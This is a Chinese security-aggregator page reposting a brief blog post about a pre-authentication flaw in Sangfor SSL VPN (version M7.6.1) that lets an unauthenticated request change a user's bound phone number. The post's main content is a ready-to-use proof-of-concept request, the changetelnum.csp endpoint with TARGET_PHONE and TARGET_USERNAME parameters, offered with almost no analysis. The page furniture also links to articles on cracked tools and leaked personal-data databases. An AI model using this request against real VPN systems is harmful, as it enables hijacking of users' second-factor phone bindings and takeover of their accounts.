欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全博客深信服 SSL VPN - Pre Auth 修改绑定手机

http://cn-sec.com/archives/720951.html 复制链接复制链接

深信服 SSL VPN - Pre Auth 修改绑定手机

2022年1月6日01:04:43评论152 views字数 239阅读0分47秒阅读模式

漏洞起因：

漏洞分析

老版本(M7.6.1)代码放上，看不懂的直接看 POC 吧；新版本的没绕成功还在审，所以不确定是不是这个

POC

1
2
3

https://<path>/por/changetelnum.csp?apiversion=1

newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1

演示

FROM :ol4three.com | Author:ol4three

http://cn-sec.com/archives/720951.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

username
target
olthree

二进制安全之栈溢出（十）

将数据从 MySQL 迁移到 MongoDB

GOGETSSL 证书购买记

生成并成功签署 ECC SSL 证书

2015.10.04 本站所做的一点优化

Python 支付宝免签工具发布

Duo Security - 一款好用的双因素身份验证产品

使用 Duo Secrity 二部验证保护你的 SSH 安全

「翻译」ngrok 1.X 使用文档

「翻译」ngrok 1.X 配置文档

本文由 admin 发表于 2022年1月6日01:04:43
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
深信服 SSL VPN - Pre Auth 修改绑定手机http://cn-sec.com/archives/720951.html

深信服EDR3.2.21 任意代码执行漏洞分析

通达OA v11.7 后台SQL注入

利用 CVE-2022-36446如何提取Webmin最高权限

教育园第三天之逻辑漏洞

COM 进程注入技术-编程技术

【HvvInfo】一款在红蓝对抗中快速对目标单位进行资产探测和基本扫描的工具

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

社工库系列教程 13,760 views 0
正方教务管理系统最新版无条件注入&GetShell 13,590 views 12
FREEBUF.COM 被黑数据无乱码 13,466 views 0
连了我的VPN，你的一举一动都在我的监控之中 10,110 views 1
Windows Server 2019开启远程桌面 7,802 views 0
偷窥狂 v2.0 破解版（原版）(爆破世界各地网页监控视频账号密码) 7,562 views 5
soyun30社工数据库 6,499 views 1

安全博客

二进制安全之栈溢出（十） 04/05 5 views
将数据从 MySQL 迁移到 MongoDB 04/04 2 views
GOGETSSL 证书购买记 04/04 5 views
生成并成功签署 ECC SSL 证书 04/04 4 views
2015.10.04 本站所做的一点优化 04/04 8 views
Python 支付宝免签工具发布 04/04 5 views
Duo Security - 一款好用的双因素身份验证产品 04/04 7 views
使用 Duo Secrity 二部验证保护你的 SSH 安全 04/04 2 views
「翻译」ngrok 1.X 使用文档 04/04 2 views
「翻译」ngrok 1.X 配置文档 04/04 4 views

热门标签

未分类 payload shell java https 勒索软件 web 漏洞复现网络安全服务器 app 恶意软件 rce xss 信息安全 github php python shellcode 攻击者 sql 数据安全远程代码执行漏洞公众号 linux microsoft 文件 cwe ip windows android cve 网络攻击代码 http 渗透测试 apache 攻击安全用户密码 ctf com 工具黑客漏洞预警身份验证应用程序漏洞网络

最新文章

CVE-2024-20697：WINDOWS LIBARCHIVE 远程代码执行漏洞 04/19 1 views
最新超劲爆 | BurpSuite_Pro_2024.2.1.5 04/19 0 views
AI团购、AI家装、AI编程，当然还有AI安全，AI的应用已经悄然进入到各行各业 04/19 0 views
漏洞探索/挖掘绕过双因素身份验证 04/19 3 views
爆破、批量PoC扫描工具 POC-T 04/19 2 views
D-Link NAS CVE-2024-3273漏洞利用工具 04/19 0 views
实战环境中的Redis 延时注入 04/19 13 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章103748 留言 542 访客17225287

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章103748
分类47
标签113774
留言542
链接0
浏览17225287
今日79
本周983
运行2943 天
更新2024-4-19

Copyright © CN-SEC中文网版权所有.

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码